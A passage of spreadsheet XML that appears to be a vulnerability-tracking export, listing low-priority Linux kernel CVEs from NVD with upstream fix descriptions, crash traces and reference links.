      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93191</t>
        </is>
      </c>
      <c r="D1008" s="5" t="inlineStr"/>
      <c r="E1008" s="5" t="inlineStr"/>
      <c r="F1008" s="5" t="inlineStr"/>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="inlineStr"/>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1008" s="5" t="inlineStr"/>
      <c r="R1008" s="5" t="inlineStr"/>
      <c r="S1008" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smack: fix incorrect task context in smack_msg_queue_msgrcv
The smack_msg_queue_msgrcv() function incorrectly checks
the permissions of the 'current' task instead of the
'target' task.
In the msgsnd() syscall path, if a receiver is already waiting,
the pipelined_send() optimization is used to push the message
directly to the receiver task:
    ipc/msg.c`pipelined_send():
    ` smp_store_release(&amp;msr-&gt;r_msg, msg)
In this case, the 'sender' (current) task performs the check
on behalf of the 'receiver' task (msr-&gt;r_tsk, passed as the
'target' parameter):
  ipc/msg.c`pipelined_send():
  ` security_msg_queue_msgrcv(,, target := msr-&gt;r_tsk,,)
However, smack_msg_queue_msgrcv() ignores the 'target' and
checks 'current':
  smack_msg_queue_msgrcv(…)
  ` smk_curacc_msq(isp, MAY_READWRITE); // current task
'current' MAY satisfy smack_msg_queue_msgrcv r/w requirement,
but 'target' (the receiver task) might NOT;
as a result, an unauthorized receiver gets the message,
violating MAC policy.
Test:
1) create a sysv message queue with label “foo”
2) echo "bar foo r" &gt;/smack/load2
3) msgrcv(,,,0,MSG_NOERROR) in "bar"-labeled task.
    The task is waiting for the messages ...
4) msgsnd() from a "foo"-labeled task:
"bar"-labeled task gets the message.
This patch fixes the issue by checking permission on the
'target' task instead of 'current'.
(2008-02-04, Casey Schaufler)</t>
        </is>
      </c>
      <c r="T1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93191</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93192</t>
        </is>
      </c>
      <c r="D1009" s="5" t="inlineStr"/>
      <c r="E1009" s="5" t="inlineStr"/>
      <c r="F1009" s="5" t="inlineStr"/>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="inlineStr"/>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr"/>
      <c r="L1009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1009" s="5" t="inlineStr"/>
      <c r="R1009" s="5" t="inlineStr"/>
      <c r="S1009" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/v3d: Clear queue-&gt;active_job when v3d_fence_create() fails
The run_job() callbacks for BIN, RENDER, TFU and CSD assign the incoming
job to queue-&gt;active_job before calling v3d_fence_create(). If
v3d_fence_create() fails, the callback returns NULL without clearing
active_job, leaving a dangling pointer.
Create a failure path in all run_job() callbacks that clears the active
job before returning NULL. The BIN path takes queue-&gt;queue_lock around the
clear as it races against v3d_overflow_mem_work(); RENDER, TFU and CSD
paths have no concurrent reader, so the clear is lock-free.</t>
        </is>
      </c>
      <c r="T1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93192</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93193</t>
        </is>
      </c>
      <c r="D1010" s="5" t="inlineStr"/>
      <c r="E1010" s="5" t="inlineStr"/>
      <c r="F1010" s="5" t="inlineStr"/>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="inlineStr"/>
      <c r="I1010" s="5" t="inlineStr"/>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr"/>
      <c r="L1010" s="5" t="inlineStr"/>
      <c r="M1010" s="5" t="inlineStr"/>
      <c r="N1010" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1010" s="5" t="inlineStr"/>
      <c r="R1010" s="5" t="inlineStr"/>
      <c r="S1010" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: analogix_dp: Fix OF node reference leak via auto cleanup
Sashiko reported a reference leak in rockchip_dp_drm_encoder_enable(),
the of_get_child_by_name() function does not call of_node_put() in a
symmetrical way [1].
Fix the device node reference leak by using __free(device_node) to
automatically manage of_node_put() for all device nodes.</t>
        </is>
      </c>
      <c r="T1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93193</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93194</t>
        </is>
      </c>
      <c r="D1011" s="5" t="inlineStr"/>
      <c r="E1011" s="5" t="inlineStr"/>
      <c r="F1011" s="5" t="inlineStr"/>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="inlineStr"/>
      <c r="I1011" s="5" t="inlineStr"/>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr"/>
      <c r="L1011" s="5" t="inlineStr"/>
      <c r="M1011" s="5" t="inlineStr"/>
      <c r="N1011" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1011" s="5" t="inlineStr"/>
      <c r="R1011" s="5" t="inlineStr"/>
      <c r="S1011" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: dw_dp: Release core resources
Core resources such as the DisplayPort AUX channel get initialized and
registered during dw_dp_bind(), but are never unregistered, which may
lead to memory leaks and/or use-after-free:
[  224.661371] BUG: KASAN: slab-use-after-free in device_is_dependent+0xe0/0x2b0
[  224.662015] Read of size 8 at addr ffff00011aee8550 by task modprobe/658
[  224.662612]
[  224.662752] CPU: 7 UID: 0 PID: 658 Comm: modprobe Not tainted 7.0.0-rc2-next-20260305 #14 PREEMPT
[  224.662759] Hardware name: Radxa ROCK 5B (DT)
[  224.662762] Call trace:
[  224.662764]  show_stack+0x20/0x38 (C)
[  224.662772]  dump_stack_lvl+0x6c/0x98
[  224.662777]  print_report+0x160/0x4b8
[  224.662783]  kasan_report+0xb4/0xe0
[  224.662790]  __asan_report_load8_noabort+0x20/0x30
[  224.662796]  device_is_dependent+0xe0/0x2b0
[  224.662802]  device_is_dependent+0x108/0x2b0
[  224.662808]  device_link_add+0x1f8/0x10b0
[  224.662813]  devm_of_phy_get_by_index+0x120/0x200
[  224.662819]  dw_dp_bind+0x34c/0xb10 [dw_dp]
[  224.662830]  dw_dp_rockchip_bind+0x194/0x250 [rockchipdrm]
[  224.662864]  component_bind_all+0x3a8/0x720
[  224.662869]  rockchip_drm_bind+0x120/0x390 [rockchipdrm]
[  224.662899]  try_to_bring_up_aggregate_device+0x76c/0x838
[  224.662904]  component_master_add_with_match+0x1f4/0x230
[  224.662909]  rockchip_drm_platform_probe+0x420/0x538 [rockchipdrm]
[  224.662939]  platform_probe+0xe8/0x168
[  224.662945]  really_probe+0x340/0x828
[  224.662950]  __driver_probe_device+0x2e0/0x350
[  224.662954]  driver_probe_device+0x80/0x140
[  224.662959]  __driver_attach+0x398/0x460
[  224.662964]  bus_for_each_dev+0xe0/0x198
[  224.662968]  driver_attach+0x50/0x68
[  224.662972]  bus_add_driver+0x2a0/0x4c0
[  224.662977]  driver_register+0x294/0x360
[  224.662982]  __platform_driver_register+0x7c/0x98
[  224.662987]  rockchip_drm_init+0xc4/0xff8 [rockchipdrm]
Since a previous commit exported dw_dp_unbind() function in DW DP core
library to take care of the necessary cleanup, use this in the
component's unbind() callback, as well as in its bind() error path.</t>
        </is>
      </c>
      <c r="T1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93194</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93195</t>
        </is>
      </c>
      <c r="D1012" s="5" t="inlineStr"/>
      <c r="E1012" s="5" t="inlineStr"/>
      <c r="F1012" s="5" t="inlineStr"/>
      <c r="G1012" s="5" t="inlineStr"/>
      <c r="H1012" s="5" t="inlineStr"/>
      <c r="I1012" s="5" t="inlineStr"/>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr"/>
      <c r="M1012" s="5" t="inlineStr"/>
      <c r="N1012" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1012" s="5" t="inlineStr"/>
      <c r="R1012" s="5" t="inlineStr"/>
      <c r="S1012" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: synopsys: dw-dp: Support unregistering the AUX channel
The DisplayPort AUX channel gets initialized and registered during
dw_dp_bind(), but it is never unregistered, which may lead to resource
leaks and/or use-after-free.
Add the missing dw_dp_unbind() function to allow the users of the
library to handle the required cleanup, i.e. unregister the AUX adapter.</t>
        </is>
      </c>
      <c r="T1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93195</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93196</t>
        </is>
      </c>
      <c r="D1013" s="5" t="inlineStr"/>
      <c r="E1013" s="5" t="inlineStr"/>
      <c r="F1013" s="5" t="inlineStr"/>
      <c r="G1013" s="5" t="inlineStr"/>
      <c r="H1013" s="5" t="inlineStr"/>
      <c r="I1013" s="5" t="inlineStr"/>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr"/>
      <c r="M1013" s="5" t="inlineStr"/>
      <c r="N1013" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1013" s="5" t="inlineStr"/>
      <c r="R1013" s="5" t="inlineStr"/>
      <c r="S1013" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvdimm: virtio_pmem: refcount requests for token lifetime
KASAN reports slab-use-after-free in __wake_up_common():
BUG: KASAN: slab-use-after-free in __wake_up_common+0x114/0x160
Read of size 8 at addr ffff88810fdcb710 by task swapper/0/0
CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted
6.19.0-next-20260220-00006-g1eae5f204ec3 #4 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux
1.17.0-2-2 04/01/2014
Call Trace:
 &lt;IRQ&gt;
 dump_stack_lvl+0x6d/0xb0
 print_report+0x170/0x4e2
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 ? __virt_addr_valid+0x1dc/0x380
 kasan_report+0xbc/0xf0
 ? __wake_up_common+0x114/0x160
 ? __wake_up_common+0x114/0x160
 __wake_up_common+0x114/0x160
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 __wake_up+0x36/0x60
 virtio_pmem_host_ack+0x11d/0x3b0
 ? sched_balance_domains+0x29f/0xb00
 ? __pfx_virtio_pmem_host_ack+0x10/0x10
 ? _raw_spin_lock_irqsave+0x98/0x100
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 vring_interrupt+0x1c9/0x5e0
 ? __pfx_vp_interrupt+0x10/0x10
 vp_vring_interrupt+0x87/0x100
 ? __pfx_vp_interrupt+0x10/0x10
 __handle_irq_event_percpu+0x17f/0x550
 ? __pfx__raw_spin_lock+0x10/0x10
 handle_irq_event+0xab/0x1c0
 handle_fasteoi_irq+0x276/0xae0
 __common_interrupt+0x65/0x130
 common_interrupt+0x78/0xa0
 &lt;/IRQ&gt;
virtio_pmem_host_ack() wakes a request that has already been freed by the
submitter.
This happens when the request token is still reachable via the virtqueue,
but virtio_pmem_flush() returns and frees it.
Fix the token lifetime by refcounting struct virtio_pmem_request.
virtio_pmem_flush() holds a submitter reference, and the virtqueue holds an
extra reference once the request is queued. The completion path drops the
virtqueue reference, and the submitter drops its reference before
returning.</t>
        </is>
      </c>
      <c r="T1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93196</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93197</t>
        </is>
      </c>
      <c r="D1014" s="5" t="inlineStr"/>
      <c r="E1014" s="5" t="inlineStr"/>
      <c r="F1014" s="5" t="inlineStr"/>
      <c r="G1014" s="5" t="inlineStr"/>
      <c r="H1014" s="5" t="inlineStr"/>
      <c r="I1014" s="5" t="inlineStr"/>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr"/>
      <c r="L1014" s="5" t="inlineStr"/>
      <c r="M1014" s="5" t="inlineStr"/>
      <c r="N1014" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1014" s="5" t="inlineStr"/>
      <c r="R1014" s="5" t="inlineStr"/>
      <c r="S1014" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
memcg: move LRU size accounting on reparenting instead of copying it
When a memory cgroup is offlined its LRU folios are reparented to the
parent.  lruvec_reparent_lru() splices the child's lists into the
parent's and credits the parent with the child's per-zone
lru_zone_size[], but never clears the child's copy, so the size is
copied rather than moved.  lru_gen_reparent_memcg() does the same for
MGLRU.
The parent is left correct, credited with exactly the folios it took
over.  The stale value sits on the child and nothing will correct it:
folio-&gt;memcg_data now resolves to the parent, so every later
update_lru_size() for those folios goes there.
Dying cgroups are not freed immediately and mem_cgroup_iter() still
walks them, so shrink_lruvec() keeps being called on them.
get_scan_count() reads the phantom counter through lruvec_lru_size() and
the scan loop then grinds through nr[] in SWAP_CLUSTER_MAX steps against
an empty list, for as long as the dead cgroup lives.  Under MGLRU the
MGLRU scanner runs instead, but count_shadow_nodes() sums all of
NR_LRU_LISTS through lruvec_lru_size() and over-budgets the shadow node
limit just the same.
On one 251 GiB host a sweep of every mz-&gt;lru_zone_size[] found 380
counters describing folios on no list at all: 124777314 pages, 476 GiB,
1.89x the machine's RAM, across 57 cgroups.  All were on memcgs with
CSS_DYING set and CSS_ONLINE clear, and parent/child pairs reported
byte-identical sizes.
LRU_UNEVICTABLE needs its size moved too.  Its list is deliberately not
spliced because lruvec_init() poisons the head - the unevictable LRU is
imaginary and folios are never threaded on it - but the size is kept by
lruvec_add_folio()/lruvec_del_folio() and those folios account to the
parent from here on.
This depends on commit bf4ade7dbd76 ("memcg: keep folio's objcg same as
its node") and must not be backported ahead of it.  Without that
invariant a folio's objcg can belong to another node, so a folio already
spliced onto the parent's list can still resolve to the child's lruvec
until the objcg's node is reparented in a later iteration of
memcg_reparent_objcgs(); clearing the child's counter early then lets
lruvec_del_folio() underflow it and trip the WARN_ONCE()/VM_BUG_ON() in
mem_cgroup_update_lru_size().</t>
        </is>
      </c>
      <c r="T1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93197</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93198</t>
        </is>
      </c>
      <c r="D1015" s="5" t="inlineStr"/>
      <c r="E1015" s="5" t="inlineStr"/>
      <c r="F1015" s="5" t="inlineStr"/>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="inlineStr"/>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr"/>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1015" s="5" t="inlineStr"/>
      <c r="R1015" s="5" t="inlineStr"/>
      <c r="S1015" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate the persisted dirty_tail chain at load
The writeback worker follows the persisted dirty_tail chain, which is
decoded from the cache device independently of the key_tail chain that
cache_replay() walks and bounds. A crafted image, whose on-media fields are
authenticated only by a crc32c with a fixed seed, can aim dirty_tail at a
chain of last ksets that never terminates, so cache_writeback_fn() re-arms
itself with no delay forever.
Walk the dirty_tail chain once at load with the same hop cap cache_replay()
uses and fail the table load with -EIO if it does not reach an end within
n_segs hops.</t>
        </is>
      </c>
      <c r="T1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93198</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93199</t>
        </is>
      </c>
      <c r="D1016" s="5" t="inlineStr"/>
      <c r="E1016" s="5" t="inlineStr"/>
      <c r="F1016" s="5" t="inlineStr"/>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="inlineStr"/>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr"/>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1016" s="5" t="inlineStr"/>
      <c r="R1016" s="5" t="inlineStr"/>
      <c r="S1016" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Do not treat master device as a duplicate target
i3c_master_search_i3c_dev_duplicate() searches the bus for another I3C
device with the same PID as the reference device.  The search can match
master-&gt;this, causing the controller itself to be returned as a
duplicate.
Since the controller is not a target device, it cannot be a duplicate of
one.  Exclude master-&gt;this from matching so that the function only
returns real duplicate target devices.</t>
        </is>
      </c>
      <c r="T1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93199</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93200</t>
        </is>
      </c>
      <c r="D1017" s="5" t="inlineStr"/>
      <c r="E1017" s="5" t="inlineStr"/>
      <c r="F1017" s="5" t="inlineStr"/>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="inlineStr"/>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr"/>
      <c r="L1017" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1017" s="5" t="inlineStr"/>
      <c r="R1017" s="5" t="inlineStr"/>
      <c r="S1017" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix use-after-free of master-&gt;this
sysfs attribute callbacks for the master controller device dereference
master-&gt;this.  However, master-&gt;this is freed in
i3c_master_detach_free_devs() before the master device itself is
released.
As a result, sysfs accesses can dereference a freed master-&gt;this
pointer, leading to a use-after-free.
Keep master-&gt;this alive until i3c_masterdev_release(), which is called
after the master device and its sysfs state are being torn down. Do not
free master-&gt;this as part of the normal device detach path.
On the error path in i3c_master_set_info(), reset master-&gt;this and
bus.cur_master to NULL before freeing the allocated device.</t>
        </is>
      </c>
      <c r="T1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93200</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93201</t>
        </is>
      </c>
      <c r="D1018" s="5" t="inlineStr"/>
      <c r="E1018" s="5" t="inlineStr"/>
      <c r="F1018" s="5" t="inlineStr"/>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="inlineStr"/>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr"/>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1018" s="5" t="inlineStr"/>
      <c r="R1018" s="5" t="inlineStr"/>
      <c r="S1018" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate seg_id fields from persistent memory
cache_pos_decode(), cache_key_decode() and the last-kset branches of
cache_replay(), the writeback worker and the GC worker take a cache
segment id from the cache device metadata and index cache-&gt;segments[]
with it without checking it against cache-&gt;n_segs. That metadata is only
CRC-protected with a fixed public seed, so whoever supplies the cache
device on a table load (CAP_SYS_ADMIN) controls the id; an out-of-range
value forms a wild pcache_cache_segment pointer that is dereferenced and
written through -- an out-of-bounds read and write driven by on-disk data.
Add cache_seg_id_valid() and reject an out-of-range id at each decode
site, failing the operation with -EIO instead of indexing past the array.
Bound the id against the initialized-segment count (cache_info.n_segs)
rather than the physical device total. A forged cache_info.n_segs below
seg_num otherwise leaves segments[cache_info.n_segs..seg_num) as zeroed
structs whose data pointer is NULL, so a forged id in that window would
still be dereferenced. A later patch guarantees cache_info.n_segs &lt;=
seg_num, and a driver-created cache sets the two equal, so valid images
are unaffected.</t>
        </is>
      </c>
      <c r="T1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93201</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93202</t>
        </is>
      </c>
      <c r="D1019" s="5" t="inlineStr"/>
      <c r="E1019" s="5" t="inlineStr"/>
      <c r="F1019" s="5" t="inlineStr"/>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="inlineStr"/>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K1019" s="5" t="inlineStr"/>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1019" s="5" t="inlineStr"/>
      <c r="R1019" s="5" t="inlineStr"/>
      <c r="S1019" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix recursive locking during device registration
i3c_master_register_new_i3c_devs() registers newly discovered devices
while holding i3c_bus_normaluse_lock(), a down_read().  device_register()
can immediately probe the device, and probe callbacks typically invoke
I3C helpers that take i3c_bus_normaluse_lock() again, leading to a
recursive acquisition of the same rwsem.  rwsems do not support recursive
read locking and can deadlock when a writer is waiting.  See the
"Recursive read locks" section of Documentation/locking/lockdep-design.rst.
For example, with Intel LPSS I3C, LOCKDEP generates a WARNING like:
  # echo intel-lpss-i3c.0 &gt; /sys/bus/platform/drivers/mipi-i3c-hci/unbind
  # echo intel-lpss-i3c.0 &gt; /sys/bus/platform/drivers/mipi-i3c-hci/bind
  WARNING: possible recursive locking detected
  kworker/5:1/94 is trying to acquire lock:
  ffff88811c810d78 (&amp;i3cbus-&gt;lock){++++}-{4:4}, at: i3c_device_match_id+0x45/0x370
  but task is already holding lock:
  ffff88811c810d78 (&amp;i3cbus-&gt;lock){++++}-{4:4}, at: i3c_master_reg_work_fn+0x21/0x5f0
Fix this by separating device creation from device registration.
Populate desc-&gt;dev under the maintenance lock, collect the devices that
still need registration into a local list, then release the lock before
calling device_register().  Finally retake the lock and clean up any
devices that failed to register.
Use the maintenance lock rather than the normal-use lock while adding
device objects.  A write-side maintenance lock prevents readers from
observing a partially initialized desc-&gt;dev during initial device
population, or desc-&gt;dev disappearing if registration fails.
The local list requires a list node, so add a list node member to struct
i3c_device.</t>
        </is>
      </c>
      <c r="T1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93202</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
